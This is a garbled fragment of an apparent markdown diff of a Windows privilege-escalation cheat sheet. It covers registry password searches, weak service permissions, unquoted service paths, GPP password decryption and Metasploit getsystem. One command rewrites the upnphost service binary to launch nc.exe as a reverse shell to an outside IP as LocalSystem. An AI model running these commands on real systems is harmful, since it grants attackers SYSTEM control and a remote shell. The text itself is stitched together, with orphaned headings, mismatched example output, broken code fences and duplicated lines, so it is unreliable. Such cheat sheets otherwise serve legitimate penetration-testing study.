Updates privilege_escalation_windows.md

reg query HKCU /f password /t REG_SZ /s

```

## Internal/Hidden Services

Sometimes there are services that are only accessible from inside the network. For example a MySQL server might not be accessible from the outside, for security reasons. It is also common to have different administration applications that is only accessible from inside the network/machine. Like a printer interface, or something like that. These services might be more vulnerable since they are not meant to be seen from the outside.

```

Example output:

```

Proto  Local address      Remote address     State        User  Inode  PID/Program name

    -----  -------------      --------------     -----        ----  -----  ----------------

wmic qfe get Caption,Description,HotFixID,InstalledOn

```

### Python to Binary

If we have an exploit written in python but we don't have python installed on the victim-machine we can always transform it into a binary with pyinstaller. Good trick to know.

cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM

```

## **Change the upnp service binary**

`

sc config upnphost binpath= "C:\Inetpub\nc.exe 10.11.0.191 6666 -e c:\Windows\system32\cmd.exe"`

`sc config upnphost obj= ".\LocalSystem" password= ""`

`sc config upnphost depend= ""`

## 

## Weak Service Permissions

Services on windows are programs that run in the background. Without a GUI.

cacls "C:\path\to\file.exe"

```

### Look for Weakness

What we are interested in is binaries that have been installed by the user. In the output you want to look for **BUILTIN\Users:(F)**. Or where your user/usergroup has **(F)** or **(C)** rights.

What we are interested in is binaries that have been installed by the user. In the output you want to look for **BUILTIN\Users:\(F\)**. Or where your user/usergroup has **\(F\)** or **\(C\)** rights.

Example:

So when you get the shell you can either type **migrate PID** or automate this so that meterpreter automatically migrates.

http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html

[http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html](http://chairofforgetfulness.blogspot.cl/2014/01/better-together-scexe-and.html)

## Unquoted Service Paths

When the program is restarted it will execute the binary **program.exe**, which we of course control. We can do this in any directory that has a space in its name. Not only program files.

This attack is explained here:  

http://toshellandback.com/2015/11/24/ms-priv-esc/

[http://toshellandback.com/2015/11/24/ms-priv-esc/](http://toshellandback.com/2015/11/24/ms-priv-esc/)

There is also a metasploit module for this is: exploit/windows/local/trusted_service_path

There is also a metasploit module for this is: exploit/windows/local/trusted\_service\_path

## Vulnerable Drivers

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

```

http://toshellandback.com/2015/11/24/ms-priv-esc/

[http://toshellandback.com/2015/11/24/ms-priv-esc/](http://toshellandback.com/2015/11/24/ms-priv-esc/)

## Group Policy Preference

gpp-decrypt encryptedpassword

```

```

Services\Services.xml: Element-Specific Attributes

ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element

DataSources\DataSources.xml: Element-Specific Attributes

```

## Escalate to SYSTEM from Administrator

### On Windows XP and Older

vdmexploit.dll

```

## Using Metasploit

So if you have a metasploit meterpreter session going you can run **getsystem**.

### Post modules

First you need to background the meterpreter shell and then you just run the post modules.  

You can also try some different post modules.

run post/windows/gather/checkvm

```

## References

[http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/](http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/)  

[http://www.fuzzysecurity.com/tutorials/16.html](http://www.fuzzysecurity.com/tutorials/16.html)  

[https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/](https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/)  

[http://it-ovid.blogspot.cl/2012/02/windows-privilege-escalation.html](http://it-ovid.blogspot.cl/2012/02/windows-privilege-escalation.html)  

[https://github.com/gentilkiwi/mimikatz](https://github.com/gentilkiwi/mimikatz)  

[http://bernardodamele.blogspot.cl/2011/12/dump-windows-password-hashes.html](http://bernardodamele.blogspot.cl/2011/12/dump-windows-password-hashes.html)  

[https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be](https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be)  

[https://www.youtube.com/watch?v=PC\_iMqiuIRQ](https://www.youtube.com/watch?v=PC_iMqiuIRQ)  

[http://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/](http://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/)  

[https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)  

[http://pwnwiki.io/\#!privesc/windows/index.md](http://pwnwiki.io/#!privesc/windows/index.md)

http://travisaltman.com/windows-privilege-escalation-via-weak-service-permissions/

http://www.fuzzysecurity.com/tutorials/16.html

https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/

http://it-ovid.blogspot.cl/2012/02/windows-privilege-escalation.html

https://github.com/gentilkiwi/mimikatz

http://bernardodamele.blogspot.cl/2011/12/dump-windows-password-hashes.html

https://www.youtube.com/watch?v=kMG8IsCohHA&feature=youtu.be

https://www.youtube.com/watch?v=PC_iMqiuIRQ

http://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/

https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp

http://pwnwiki.io/#!privesc/windows/index.md

 No newline at end of file